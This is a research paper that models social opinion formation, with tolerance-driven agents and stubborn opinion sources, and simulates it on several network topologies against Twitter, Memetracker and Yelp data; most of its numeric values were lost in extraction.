• memetracker: initiation starts at ox = and ends at ox = [ , , . ], and has an average amplitude oy = % [ %, %, . ]. fusion happens at ox = and has an amplitude of % (i.e., it represents the maximum spike). tolerance starts on average at ox = ( , end of time series, . ), and has an average amplitude oy = % [ %, %, . ]. intolerance starts on average at ox = ( , end of time series, . ), and has an average amplitude oy = % [ %, %, . ].
• yelp (all measurements are translated to the left on the time axis so that t = 0 coincides with the spike in sa, namely point a): initiation starts at ox = and ends at ox = [ , , . ], and has an average amplitude oy = . [ . , . , . ] stars.
fusion happens at ox = [ , ] and has an amplitude of oy = . [ . , . ] stars. tolerance starts on average at ox = [ , ], and has an average amplitude oy = . [ . , . ] stars. intolerance starts on average at ox = [ , end of time series], and has an average amplitude oy = . [ . , . ] stars.
figure (the four opinion formation phases): the phases are represented in terms of normalized amplitude (number of tweets/maximum number of tweets, or opinion change in yelp/maximum opinion change in stars), with each bar-plot depicting the minimum, maximum and average variation of opinion change; and time duration (on the ox time-axis), with each horizontal bar depicting the minimum and maximum durations of the phase (gray) and the time at which it occurs on average (orange). all datasets indicate the same shape of opinion dynamics and the same succession of phases: i-initiation, f-fusion, t-tolerance and t-intolerance.
by corroborating the four obtained intervals, and also by analyzing the shapes rendered in fig. , on both the ox axis (time axis) and the oy axis (opinion change), we can conclude that the four phases are recurrent in all datasets and, indeed, representative of opinion formation.
phase transition
with data from yelp, we show the effects of a phase transition from social instability to social balancing, which can occur when a critical concentration of opinion sources is reached in a social network. figure highlights the fact that opinion (i.e., the stars given by users to a particular business) stabilizes only after reaching a critical ratio of opinion sources (i.e., votes representing strong opinions). this can be viewed in fig. at time point ox = . we interpret this phenomenon as a rise beyond a threshold σ for the concentration of opinion sources, which determines the social balancing, i.e., the average opinion stabilizes despite opinion oscillations at the local level. corroborating all these empirical observations with the statistical analysis, we can state that twitter and memetracker illustrate a responsive type of behavior, i.e., an immediate evolution towards the f phase, so a high opinion change is quickly reached for a relatively small ratio σ of opinion sources. this behavior, in turn, correlates well with another study which shows that twitter online networks have a strong random and small-world component (duma & topirceanu, ). in contrast, the yelp dataset can be associated with a saturated type of behavior, as the ratio σ (relative to the maximum number of votes) needed to trigger the phase transition towards social balancing is high in all three cases. balancing does not occur until a high concentration of opinion sources (we interpret them as similar to opinion-influencing "stubborn agents" (acemoglu et al., ) or "blocked nodes" (ruan et al., )) is inserted into the social network.
new tolerance-based opinion model
this section analyzes the characteristics of a new opinion model that can reproduce this kind of real-world phenomena, i.e., the four opinion formation phases and the phase transition towards social balancing. our interaction model is tested on synthetic networks and compared to the empirical data—introduced in the previous section—through qualitative means. in terms of network structure, our analysis includes the basic topologies, namely mesh, random (erdös & rényi, ), small-world (watts & strogatz, ), and scale-free networks (barabási & albert, ).
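as a side note, the following python sketch (using networkx) shows how comparable synthetic topologies can be generated; all sizes and probabilities are illustrative placeholders, since the exact experimental parameters are given only later in the text (and are partially elided here).

import networkx as nx

def make_topologies(n=1024, seed=42):
    # illustrative generators for the topology families discussed in the text;
    # the parameter values are placeholders, not the experimental settings
    side = int(n ** 0.5)
    return {
        "mesh": nx.convert_node_labels_to_integers(nx.grid_2d_graph(side, side)),
        "random": nx.erdos_renyi_graph(n, p=0.01, seed=seed),              # erdos-renyi
        "small_world": nx.watts_strogatz_graph(n, k=6, p=0.5, seed=seed),  # watts-strogatz
        "scale_free": nx.barabasi_albert_graph(n, m=3, seed=seed),         # preferential attachment
    }

for name, g in make_topologies().items():
    print(name, g.number_of_nodes(), g.number_of_edges())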
also, based on the last decade of research on realistic social network topology generation, which either adds the small-world property to scale-free models (holme & kim, ; fu & liao, ; li, qian & wang, ) or adds a power-law degree distribution to small-worlds (jian-guo, yan-zhong & zhong-tuo, ; chen, zhang & huang, ; wang & rong, ; zaidi, ), we also consider the watts–strogatz model with degree distribution (wsdd) (chen, zhang & huang, ). in terms of opinion dynamics, we rely on a predictive opinion interaction model that can be classified as graph- and threshold-based (guille et al., ). generally speaking, previous models use fixed thresholds (javarone & squartini, ; biswas et al., ; li et al., ; das, gollapudi & munagala, ; li et al., ) or thresholds extracted from real-world examples (galuba et al., ; saito et al., ). however, there are a few models which use dynamic thresholds (fang, zhang & thalmann, ; deng, liu & xiong, ; li et al., ), but their evolution is not driven by the internal states of the social agents. on the other hand, our empirical references (i.e., twitter, memetracker and yelp) indicate that opinion does not cease to oscillate and that consensus is a rare case in the real world. therefore, we propose an opinion interaction model based on stubborn agents, because it assumes that the society does not reach consensus. based on recent research on stubborn agents which uses a discrete (yildiz et al., ) or continuous (acemoglu et al., ) representation of opinion, we integrate the following opinion models: one-to-one (simple contagion) versus one-to-many diffusion (complex contagion) (centola & macy, ), and discrete (0 or 1) versus continuous (0–1) opinion representation. by combining opinion representation and opinion diffusion, we obtain distinct models; they are defined in fig. a and exemplified in figs. b and c. we build our tolerance-based opinion interaction model by using the sd and sc opinion representations as defined in fig. a. given a social network g = {v, e} composed of agents v = {1, 2, ..., n} and edges e, we define the neighborhood of agent i ∈ v as ni = {j | (i, j) ∈ e}. the disjoint sets of stubborn agents v0, v1 ⊂ v (opinion sources) and null agents vnull ⊂ v (non-participants with no opinion) never change their opinion, while all other (regular) agents v \ {v0 ∪ v1 ∪ vnull} update their opinion based on the opinion of one or all of their direct neighbors. we use xi(t) to represent the real-time opinion of agent i at time t. normal (regular) agents can start with a predefined random opinion value xi(0) ∈ [0, 1]. the process of changing the opinion of regular agents is triggered according to a poisson distribution and consists of either adopting the opinion of a randomly chosen direct neighbor, or an averaged opinion of all direct neighbors. we represent with si(t) the discrete opinion of an agent i at moment t having continuous opinion xi(t). in the case of the discrete opinion representation sd (fig. a), xi(t) = si(t); in the case of the continuous opinion representation sc (fig. a), si(t) is given by eq. ( ):
si(t) = 0 if 0 ≤ xi(t) < 0.5; none if xi(t) = 0.5; 1 if 0.5 < xi(t) ≤ 1. ( )
furthermore, s(t) denotes the average state of the population at a certain time t, obtained by averaging the opinion of all individual agents i ∈ v:
s(t) = (1/|v|) Σ i∈v si(t). ( )
the previous social interaction models (deffuant et al., ; javarone & squartini, ; li et al., ; chau et al., ; das, gollapudi & munagala, ; fang, zhang & thalmann, ; li et al., ) do not assign nodes (i.e., individuals or social agents) the basic properties of humans, i.e., humans evolve, learn, react, and adapt in time. the reason for the simplicity of the existing models is twofold: first, the state-of-the-art models are only suited for theoretical contexts, so bringing additional complexity to the interaction model would significantly increase the difficulty of mathematical analysis; second, involving measures of human personality (e.g., quantifying an individual's trust, credibility, or emotional state) is a complicated endeavor, in general; this was not the main goal of previous work.
figure (the interaction models, based on the two types of opinion representation and two types of diffusion): (a) taxonomy. (b) opinion representation types, where the larger nodes (labeled with s) represent stubborn agents (or opinion sources) which can have any value for opinion, with the property that their opinion value never changes. discrete opinion (left): nodes have opinion 0 (red) or 1 (green) at any time (sd). continuous opinion (right): nodes have any opinion between 0 and 1, highlighted by the color gradient transitioning from red to green (sc). (c) a scenario highlighting the two opinion diffusion models for the discrete representation. single diffusion (left): the central white node picks one random neighbor and adopts his opinion. complex diffusion (right): the white node polls all neighbors for their opinion and then adopts an averaged opinion. note that only direct neighbors can influence opinion, not friends of friends (e.g., the gray node).
individual tolerance: interpretation and formalism
in order to improve the existing opinion interaction model based on a fixed threshold, we consider the evolution of personal traits by taking inspiration from social psychology. as a new contribution to the state-of-the-art, we introduce the concept of tolerance, which reflects the individual's inner state and personal beliefs regarding surrounding opinions. for instance, egocentrism, as it is called in psychology, is highly correlated with the individual's emotional state (elkind, ). we choose to extend this model because the egocentrism–emotional state correlation is a trait that has been shown to influence and evolve with individual opinion (windschitl et al., ). corroborating literature on attitude certainty (clarkson et al., ), consensus (clarkson et al., ), confirmation bias (nyhan & reifler, ), social group influence (roccas & amit, ), and ingroup emotion (moons et al., ), we extrapolate the mechanism that leads to the formation of opinion into a measurable parameter. as such, we define tolerance θ as a parameter that reflects the willingness of an agent to accept new opinions. similar to real life, individuals with higher tolerance will accept the opinions of others more easily; thus, this parameter can be defined as a real number 0 ≤ θ ≤ 1. an agent with a tolerance value of 1 is called fully tolerant, whereas an agent with a tolerance of 0 is called fully intolerant (i.e., a stubborn agent). tolerance values greater than 0.5
describe a tolerance-inclined agent, while values smaller than 0.5 describe an intolerance-inclined agent. similar to the threshold-based continuous opinion fluctuation model described by acemoglu et al. ( ), tolerance can be used as a trust factor for an agent relationship; however, as opposed to the trust factor, tolerance changes its value over time:
xi(t) = 0 if i ∈ v0; 1 if i ∈ v1; 0.5 if i ∈ vnull; θi(t) · xj(t) + (1 − θi(t)) · xi(t − 1) if j ∈ ni, for t > 0 ( )
where the new opinion xi(t) is a weighted sum of the agent's prior opinion xi(t − 1) and the current opinion xj(t) of one randomly selected direct neighbor. the weights for the two opinions are given by the current tolerance θi(t) of the agent; thus, the extent to which it can be influenced depends on its internal state. as can be inferred from eq. ( ), the greater the tolerance of an agent, the more easily it can accept external opinions from others. at the beginning of the opinion formation process (t = 0), all agents are considered as having a high tolerance (θi(0) = 1), but, as the society evolves, agents become intolerant and therefore segregated in clusters which tend to have a more stable opinion. we further define the tolerance θ of the entire population as a normalized average of all individual tolerances:
θ(t) = (1/|v|) Σ i∈v θi(t). ( )
we also introduce the concept of opinion change ω as the ratio of agents which have changed their current state (discrete time step t) since the last observation (time t − 1):
ω(t) = (1/|v|) Σ i∈v |si(t) − si(t − 1)|. ( )
if an agent changes its state from one opinion to another, then the absolute difference |si(t) − si(t − 1)| will be 1; conversely, it will be 0 if the agent's state does not change. this change, averaged over all agents at the interaction (discrete) moment t, defines the opinion change of the population ω(t). this metric is used to draw insights regarding the current tolerance level across the entire society.
progressive tolerance model
our model for tolerance evolution stems from the idea that the evolution towards both tolerance and intolerance varies exponentially (hegselmann & krause, ; weidlich, ), e.g., a person under constant influence becomes convinced at an increased rate over time. if that person faces an opposing opinion, it will eventually start to progressively build confidence in that other opinion. thus, our proposed progressive model represents the tolerance fluctuation as a non-linear function, unlike other models in the literature. for the first time, we integrate these socio-psychological characteristics in the dynamical opinion interaction model; as such, the new tolerance state is obtained as:
θi(t) = max(θi(t − 1) − α0 · ε0, 0) if si(t − 1) = sj(t); min(θi(t − 1) + α1 · ε1, 1) otherwise. ( )
in eq. ( ), tolerance decreases by a factor of α0 · ε0 if the state of the agent before the interaction, si(t − 1), is the same as the state of the interacting neighbor (randomly chosen from all direct neighbors) sj(t). if the states are not identical, i.e., the agent comes in contact with an opposite opinion, then the tolerance will increase by a factor of α1 · ε1. the variable t represents the time step at which an opinion update is triggered; these moments are considered as being randomly distributed.
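a compact python sketch of the update rules in the equations above (simple one-to-one diffusion with continuous opinions) is given below; the per-event counters α0, α1 and the weights ε0, ε1 introduced next are collapsed here into two fixed step sizes, so this is an approximation of the model for illustration, not the socialsim implementation.

import random

def discretize(x):
    # map a continuous opinion in [0, 1] to the discrete state 0, 1 or none
    if x < 0.5:
        return 0
    if x > 0.5:
        return 1
    return None

def step(opinions, tolerance, neighbors, stubborn, step_dec, step_inc, rng=random):
    """one asynchronous sweep of the tolerance-based update (sketch).
    `stubborn` is the set of agents whose opinion never changes; step_dec and
    step_inc stand in for the alpha*epsilon factors of the progressive model."""
    for i in opinions:
        if i in stubborn or not neighbors[i]:
            continue
        j = rng.choice(neighbors[i])
        prev = discretize(opinions[i])
        # x_i(t) = theta_i * x_j(t) + (1 - theta_i) * x_i(t-1)
        opinions[i] = tolerance[i] * opinions[j] + (1 - tolerance[i]) * opinions[i]
        # same state as the chosen neighbor -> less tolerant; different -> more tolerant
        if prev == discretize(opinions[j]):
            tolerance[i] = max(tolerance[i] - step_dec, 0.0)
        else:
            tolerance[i] = min(tolerance[i] + step_inc, 1.0)

def global_metrics(states_prev, opinions, tolerance):
    # average state s(t), average tolerance theta(t) and opinion change omega(t)
    n = len(opinions)
    states = {i: discretize(x) for i, x in opinions.items()}
    s = sum(v for v in states.values() if v is not None) / n
    theta = sum(tolerance.values()) / n
    omega = sum(1 for i in states if states[i] is not None
                and states_prev.get(i) is not None and states[i] != states_prev[i]) / n
    return s, theta, omega, states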
the two scaling factors, α0 and α1, both initially set to the same value, act as weights (i.e., counters) which are increased to account for every event in which the initiating agent keeps its old opinion (i.e., tolerance decreasing) or changes its old opinion (i.e., tolerance increasing). therefore, we have:
α0 ← α0 + 1 if si(t − 1) = si(t), and α0 is reset to its initial value otherwise; ( )
α1 is reset to its initial value if si(t − 1) = si(t), and α1 ← α1 + 1 otherwise. ( )
figure (the tolerance function as defined by the progressive tolerance model): (a) tolerance scaling: shows how tolerance θ increases with the α1 · ε1 scaling, as a result of continuous opinion change for an agent i. (b) intolerance scaling: shows how tolerance θ drops with the α0 · ε0 scaling, from an initial tolerance θi(0) = 1 to complete intolerance (θi(t) = 0).
in line with the observation of the majority illusion (lerman, yan & wu, ), which explains that globally rare opinions and bias may be strongly present in local neighborhoods as a result of the topology of social networks, we dynamically model bias using the two scaling factors α0 and α1. whenever an event occurs, the counter corresponding to the other type of event is reset. these factors are used to increase the magnitude of the two tolerance modification ratios ε0 (intolerance modifier weight) and ε1 (tolerance modifier weight). the two ratios are chosen with the fixed values of ε0 = . and ε1 = . . to determine these values, we have tried various ε0:ε1 ratios as follows: if ε0 is increased such that ε0:ε1 = : , most nodes will quickly become intolerant, as opinion will cease to diffuse; conversely, if ε0 is decreased closer to a : ratio, then the society will become tolerance-inclined, with random opinion fluctuations. the used ε0:ε1 ratio of : was chosen through consistent experimentation in order to provide a good balance between the deviations towards tolerance and intolerance, respectively. as an illustration of this ratio for ε0:ε1, fig. represents the non-linear tolerance function as implemented in eq. ( ). the displayed examples show that a number of consecutive steps are required to maximize the tolerance of an agent starting with θi(0) = . , because the cumulative sum θi(0) + ε1 Σj α1(j) reaches 1 after that many iterations. similarly, in fig. b, the sum θi(0) − ε0 Σj α0(j) requires t = iterations to reach intolerance (θi(t) = 0), having started from θi(0) = 1.
model validation
our dynamical opinion model adds significant complexity to the opinion interaction model. therefore, we use discrete event simulation (socialsim (topirceanu & udrescu, )) over complex social network topologies, in order to validate our model's capability to reproduce real-world phenomena like the opinion formation phases and the phase transition towards social balancing. an important aspect is that our model is based solely on the simple sd/sc contagion principles. we have also implemented a complex contagion model in socialsim and performed extensive simulations to compare it against our simple contagion results; we have found that when using complex contagion, the dynamics of the society is accelerated, the i and f phases occur very fast, the t phase is omitted, and the society enters the intolerance phase.
this is due to the fact that averaging the opinion of neighbors does not allow a node to be in contact with the likely divergent opinions of his neighbors, one by one, and thus tolerance cannot increase. as a consequence, nodes tolerance θ will decrease after each interaction. conceptually, we have defined the tolerance model to keep nodes tolerant through individual interactions which present diversity in opinion, like we would have in real life. even if humans usually evolve towards the average opinion of their social group, they do so through sequences of individual interactions, as our model tries to capture. simulation on basic topologies regular networks the first simulation setup is based on regular topologies, i.e., lattice and mesh. the results show that a homogeneous cluster of stubborn agents divides the overall society opinion (i.e., green ( ) vs. red ( )) with a ratio that is directly proportional with their initial distribution. figure is used as an exemplification of the four phases, as obtained in socialsim, and shows how a mesh network of , agents (generated by placing nodes uniformly in a , by , unit space and connecting them within a radius of with link probability p = . ) evolves under the influence of stubborn agents— of each opinion evenly distributed among the population. this way, we observe the same opinion formation phases as identified by our empirical observations: initiation i (fig. a), fusion f (fig. b), tolerance t (fig. c), and intolerance t (fig. d). the situation in fig. c may lead to one of two scenarios: a perpetual (proportional) balance of the two opinions, introduced by us as social balancing (the society remains in the t phase, and t is never reached), or a constant decrease in opinion dynamics which ultimately leads to a stop in opinion change (the society reaches the t phase), as depicted in fig. d. figure provides illustrative, single experiment results, which intend to capture the specific behavior of opinion evolution. again, the same patterns were observed throughout all our multiple simulations. figure a illustrates a society which tends towards the tolerance phase t and social balance, by providing the evolution of the overall society state s(t) (as defined in eq. ( )), tolerance θ (t) (see eq. ( )), and opinion change ω(t) (eq. ( )). for the society described in fig. a, the initiation phase i is revealed by the early increase of ω(t), as the number of individuals with opinion increases. the climax of ω(t) represents the fusion phase f. at this stage, there is a maximum number of bordering agents with distinct opinions (a situation that is also depicted in fig. b) and s(t) evens out. in the tolerance phase t, the agents tend to stabilize their opinion, i.e., θ (t) stabilizes and s(t) converges towards the ratio of stubborn agents (which was chosen as : ). another observation is that opinion fluctuation is determined by the stubborn agents density (see fig. b, c and d). because of the regular topology, the fewer stubborn agents (regardless of their opinions) there exist in the society, the more the opinion topirceanu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure green ( ) vs. red ( ) opinion evolution with homogeneous stubborn agent distribution in a , node social network. the network is initialized with red and green stubborn agents (represented as the darker nodes) which start influencing the neighboring regular agents. 
initially, the regular agents have no opinion and are colored with grey. we distinguish between the following phases of opinion formation: (a) the initiation phase i where the society has no opinion, i.e., the stubborn agents exercise their influence to the surrounding neighborhood without being affected by any other opinion. the opinion change ω(t) rises during this phase, whereas tolerance θ (t) remains high. (b) the fusion phase f where the society is now mostly polarized (green or red) and different opinion clusters expand and collapse throughout the society. the opinion change ω(t) reaches a maximum, and tolerance θ (t) begins to slowly decrease. (c) tolerance phase t, where the cluster interaction stabilizes and new, larger, more stable clusters emerge. most of the individuals within the society have been in contact with both opinions; each agent’s opinion si(t) begins to converge, and the tolerance θ (t) is steadily declining or becomes stable. (d) intolerance phase t, where the overall tolerance of agents has decreased to a point where opinion fluctuation ceases and the red opinion becomes dominant (θ (t) < . ). the society may or may not reach this phase. topirceanu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure simulation of a , mesh network with socialsim (topirceanu & udrescu, ), display- ing a representative example for the evolution of s(t), θ (t), and ω(t), as well as the opinion evolution s(t) with various stubborn agents distributions. (a) representative setup for the mesh topology, where the lowest panel displays the opinion change (ω) evolution over three simulation phases: (i) initiation, (f) fusion, and (t) tolerance. the opinion state (s) and its tolerance (θ ) are also displayed in the middle and upper panels. (b) opinion evolution s(t) with few and evenly distributed stubborn agents sa ( : ratio: green, red). (c) opinion evolution with many and evenly distributed stubborn agents ( : ratio: green, red), (d) opinion evolution with few and unevenly distributed stubborn agents ( : ratio: green, red). fluctuates. this is explained by the fact that having few stubborn agents means few points of opinion control and stabilization in the local mesh structure; conversely, many stubborn agents make possible the control of more regular agents. because of this, s(t) may drastically get biased in someone’s favor until the entire society stabilizes (fig. b). also, due to the small influencing power of a few agents, the opinion will not necessarily stabilize with the same distribution ratio. as expected, the opinion distribution of a society with a high opinion source concentration will tend towards the ratio of the two stubborn agent populations (fig. c). if the ratio of the two stubborn agent populations is not : , then the opinion fluctuation will be around that ratio only during the initiation phase i. afterwards, the overall opinion will get more biased towards the opinion of the larger stubborn agent population. in fig. d the ratio is : between green and red stubborn agents, therefore the fluctuation starts around % green opinions, but eventually stabilizes at %. topirceanu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure (a) representative simulations depicting opinion evolution in networks with uniformly dis- tributed stubborn agents for both competing opinions. 
(a) an uncorrelated random scale-free network in which opinion constantly oscillates; the society becomes balanced and stabilizes in the tolerance phase (t) after going through the initiation (i) and fusion (f) phases. (b) an erdos–renyi network in which opinion change is maintained high and opinion presents high oscillations, but the overall state s of the society becomes stable and predictable around 50% (i.e., as expected for a balanced ratio of sas).
the scenarios presented above hold true for lattices. consequently, these conclusions are more of theoretical interest, as real social networks are typically not organized as such regular topologies. next, we consider more realistic network topologies.
random networks
in order to generate random topologies, we have implemented both erdos–renyi networks (erdös & rényi, ) (see fig. a), as well as uncorrelated networks with preferential attachment (uncorrelated scale-free) as defined by catanzaro, boguna & pastor-satorras ( ) (see fig. b). we create networks of nodes with the erdos–renyi algorithm (erdös & rényi, ) with wiring probability p = 10− , and with the algorithm described in catanzaro, boguna & pastor-satorras ( ) with nodes with power-law distributed node degrees within the range – . we use an exponent of γ = − . , which is within the power-law interval −3 < γ < −2. because of the random nature of this second topology, the results obtained with socialsim are much closer to what we obtain for random networks. figure represents the opinion formation phases. due to the disassortative connectivity, opinion dynamics leads to an evolution towards social balance. the explanation for this balancing is the fact that nodes may be connected to any random hubs, so neighboring nodes will not adhere to the same community influenced by the exact same hubs. this diversity in connections keeps tolerance high, so that opinion is kept in balance.
small-world networks
by constructing watts–strogatz small-world networks of nodes (watts & strogatz, ; strogatz, ; wang & chen, ; tsvetovat & carley, ; chen, zhang & huang, ; bandyopadhyay et al., ), we show experimentally that a different type of behavior can emerge. specifically, we used multiple simulation settings with rewiring probabilities p = . , p = . and p = . , respectively, and keep the results for p = . as the most representative, because the clustering coefficient remains high (i.e., . ). as such, figs. a and b present the society as having a mixed opinion distribution with clusters forming around stubborn agents. similar to the representation in fig. , this topology allows multiple agents to cluster around the stubborn agents and converge towards their opinion. a higher rewiring parameter p is associated with a more random topology, which is found to increase tolerance and dissolve agent clusters around opinion sources. consequently, this model not only increases the dynamics of opinion fluctuation, but also keeps the society in social balance. the fourth and final phase of opinion evolution—the intolerance phase—does not occur, and opinion change ω(t) is maintained at a (high) constant level. moreover, the state of the society s(t) is stable. the society depicted in fig. a is homogeneously mixed from an opinion standpoint. clusters do not form because many agents have long-range links to other distant agents whose opinion can be different from the local one.
this leads to a perpetual fluctuation which remains in balance. the noticeable effect on a small-world network is that the opinion stabilizes very fast and always at the ratio of the two stubborn agent populations (i.e., : in our case). in a mesh network, having few stubborn agents leads to an imbalance of opinion, but in the case of small-world topologies, opinion across the entire population always stabilizes. opinion change ω(t) is also much higher compared to the mesh (i.e., % versus % under the same conditions) due to the long range links. networks with preferential attachment we apply the same methodology by constructing a , node barabasi–albert (ba) network with preferential attachment and highlight the unique behavior it enacts (barabási & albert, ; pastor-satorras & vespignani, ; albert & barabási, ; wang & chen, ; song, havlin & makse, ; chen, zhang & huang, ). as fig. c shows, the society does not reach a balance at the expected value ( : ⇒ %); instead, it gets biased towards one opinion or another. the reason behind this behavior is related to the power-law degree distribution (wang & chen, ). as such, ba scale-free networks behave more like a tree-structure with hubs rather than as a uniform graph. indeed, as opinion flows from one agent to another, the higher impact of the hub nodes on the opinion formation at the society level becomes clear. if, for example, a green stubborn agent is placed as the root of a sub-tree filled with red stubborn agents, that sub-tree will never propagate red opinion as it cannot pass through the root and connect with other nodes. experimentally, this is illustrated in fig. c. the green agents have been placed over nodes with higher degrees, and this can be seen in the evolution of the opinion. there is some initial fluctuation in the society and although the stubborn agent distribution is even, the fluctuation rapidly imbalances as the overall tolerance θ (t) plummets and all topirceanu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure opinion evolution with homogeneous stubborn agent distribution ( : ) in small-world and ba networks. (a) tolerance phase where visible clusters emerge for small-world networks. (b) for small-world networks, social balancing is attained because tolerance remains extremely high (θ (t) > %), opinion change (ω) exhibits the three opinion evolution phases (initiation i, fusion f, and tolerance t), and never reaches intolerance. the state of the society s(t) is stable. (c) social balancing is not achieved for ba networks: tolerance drops constantly and the society reaches the intolerance phase (t). the state of the society s(t) is unstable during the first three phases of opinion change, then stabilizes as tolerance (θ ) and opinion change (ω) fall. agents become sort of “indoctrinated” by the green opinion. the rapid drop in tolerance coincides with the drop in opinion change ω(t) and the stabilization of the state s(t) at over %. simulations were also run on the wsdd topology (chen, zhang & huang, ), which has a strong preferential attachment component, and yield similar results which lead to the same set of observations. we generated the wsdd topology based on topirceanu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. 
figure simulation results on a small-world network with red and green stubborn agents for the: (a) fully random interaction model: there are no opinion formation phases, the society is balanced all the time and the opinion has almost no oscillations; (b) random-tolerance interaction model: there are no clear opinion formation phases, the society is balanced all the time, while the opinion has oscillations. communities, each with , nodes. the nodes are connected with k = neighbors on each side and a rewiring probability p = . . validation hypotheses in order to strengthen the idea of social balancing, which is observed in our experimental data, we propose to validate the tolerance model against a null/random model. this is addressed by the implementation of random interacting agents in our simulation tool, followed by a replication of the experiments, and a final conclusion. we have added randomness in two ways: • fully-random interaction model: all agents have random tolerance values, random initial opinions, interact with random neighbors who posses random opinions, and tolerance is updated randomly after each interaction. looking at the simulation results with random interaction model, we obtain the same output regardless of topology and sa concentration. • random-tolerance interaction model: similar with our proposed opinion interaction model, but here each agent receives a static tolerance initialized with a random value in the [ , ] interval at startup. figure depicts a small-world with green and red stubborn agents. the state of the society remains balanced at % and there are no visible opinion formation phases. with the random-tolerance interaction model, the state of the society oscillates much more in comparison with the fully random model, but less when compared with our proposed tolerance interaction model. as for the fully-random model, the opinion formation topirceanu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. phases are not clear. we can only conclude that using a random/null model for validation shows that tolerance actually plays an important role in the statistical results obtained in our paper. in real-world social networks there are agents which do not hold any opinion, and they simply do not participate the diffusion process. we have covered this scenario in eq. ( ) as an agent which has opinion x(t) = . will carry the state none. these agents are called null agents (na) and do not take part in the opinion interaction. theoretically, we consider that nas should act like edge-disconnections in the graph. by adding nas in socialsim, we were able to test them with all our synthetic topologies. the higher the population of randomly distributed nas, the fuzzier the four phases become. initiation (i) is less steeper, fusion (f) isn’t that spiky anymore, tolerance (t) is achieved harder/later as the state oscillates more, but the society is still in balance and predictable; opinion change stabilizes with some delay. the phases tend to dissolve after a concentration of approximately % population of null agents. additional simulations have been run with nas and all obtained results lead to the same observations as those presented in figs. a– f. all tests from fig. were run on small-worlds with , nodes. in reference acemoglu et al. 
( ) the authors try to solve the equations that describe the stationarity of opinion evolution by using random walks from regular agents to stubborn agents which influence their state. even if their model is simpler than the model proposed in our paper, they have to come up with some simplifying assumptions in terms of network topology (only regular topologies are tractable) and number of agents (they solve equations on small networks and then generalize the results in a qualitative discussion). because our paper adds significant complexity to the model (i.e., node tolerance is not a fixed threshold, but a dynamic one which depends on the interactions with neighbors), solving the stationarity equations would require even stronger simplifying assumptions. this is the reason for using simulation in order to analyze the stationarity distribution. nonetheless, in all simulation scenarios, the obtained stationarity described in the paper coincides with one of two (mutually exclusive) cases: • the society reaches intolerance as overall tolerance converges towards (i.e., θ (t) ≃ for t → ∞). when this happens, no further modifications to the state of the society can be achieved. we obtain this behavior on mesh and ba topologies. meshes imply only local connectivity to neighbors that converge towards a similar state, thus tolerance is bound to decrease to (see fig. a). ba networks imply connections to hub nodes, which means that all neighbors are influenced by the same local hubs, which in turn decreases tolerance to (see fig. c). such a situation, in the case of regular small networks, was already mathematically described by acemoglu et al. ( ). the authors measure the probability of being influenced by a sa using random walks. in our case, eq. ( ) can be simplified, for the majority of nodes with θi(t) ≃ , to: xi(t) = xi(t − ), so the state of the society becomes stable. • the society remains in social balance, as the overall tolerance converges towards a non-zero constant in time (i.e., θ (t) > for t → ∞), which causes the state and opinion topirceanu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure simulation results for the tolerance-based opinion interaction on a small-world network with , nodes, of which are green sas and red sas. the social network consists of (a) % null agents, (b) % null agents, (c) % null agents, (d) % null agents. change to also stabilize (for t → ∞). we obtain this phenomenon on random and small-world topologies. small-worlds have the unique feature of being both regular and random in a proportion p, given by the rewiring parameter of the watts–strogatz algorithm. thus, nodes interact with equal probability (for p = . , as used in our experiments) with neighbors with similar opinion, and with distant random nodes with different opinion. a proportional value p = . will keep tolerance at maximal value as can be seen in fig. b. due to the random distribution of initial opinion and links (in random networks and small-worlds with p = . ), nodes will oscillate ergodically, and both eqs. ( ) and ( ) will be activated with relatively equal probability. this keeps the tolerance variation of each node around a certain convergence value: θi(t) = θi(t − ) ± α / ε / , where both α ε = and α ε = imply small variation in θi(t). in such a case, for a relatively stable tolerance, the stationarity can also be described as in acemoglu et al. ( ) (where θ is assumed as fixed). topirceanu et al. ( ), peerj comput. 
sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. phase transition in opinion dynamics this section aims at analyzing the impact of topology, network size, interaction model, stubborn agent placement, ratio and concentration on the opinion change (ω), and on convergence towards intolerance (θ ). simulations show that, in a society with a fixed stubborn agent distribution, the topology τ determines if: • the society enters the intolerance phase i: θ → (with θ < . ), which also results in ω → ; • the society balances and never enters the intolerance phase i: θ → θlimit, where θlimit > . and maintains a high ω; • the society continues to oscillate for . < θ < , but the tolerance level does not stabilize. in case of the yelp dataset, we notice that for a given topology τ , and a network of size n , when the concentration of stubborn agents is bigger than a critical ratio σ , the society never becomes intolerant. in such cases, the society becomes balanced, with slight oscillation in tolerance or opinion change. the goal is therefore to find the tuples (τ , n , σ ) at which this phenomenon occurs. to obtain our results we have used five topologies τ (mesh, random, small-world, ba and wsdd), network sizes n of up to , nodes, our new tolerance interaction model, a ratio of : between green ( ) and red ( ) stubborn agents, and an increasing concentration of stubborn agents ranging from % to %. impact of topology the tolerance and opinion change with respect to the number of stubborn agents, as depicted in figs. a and b highlight a clear difference between the five topologies, namely mesh, random, small-world, ba, and wsdd. there is a total of three clearly distinguishable behaviors: a responsive behavior (present in small-worlds and random graphs), a linear behavior (for mesh networks), and a saturated behavior (corresponding to ba and wsdd networks). the tolerance increases linearly for the mesh, as the population of stubborn agents increases. consequently, there is no critical σ for which a phase transition occurs due to the high regularity of the network, but there is a visible saturation point (when the blue graph begins to drop in fig. a). this happens because the society is physically filled with more stubborn agents than regular ones and because all stubborn agents have θ = , the overall tolerance begins to drop. the responsive behavior exhibited by the random network and small-world networks suggests that these two topologies behave similarly in the context of opinion source saturation. the two topologies are almost identical under the conditions defined here, as they behave almost as the opposite of mesh networks: once the critical point σ is reached, their tolerance rises to the maximum value. then, as the stubborn agents population increases, the tolerance and opinion change values decrease proportionally. the random topirceanu et al. ( ), 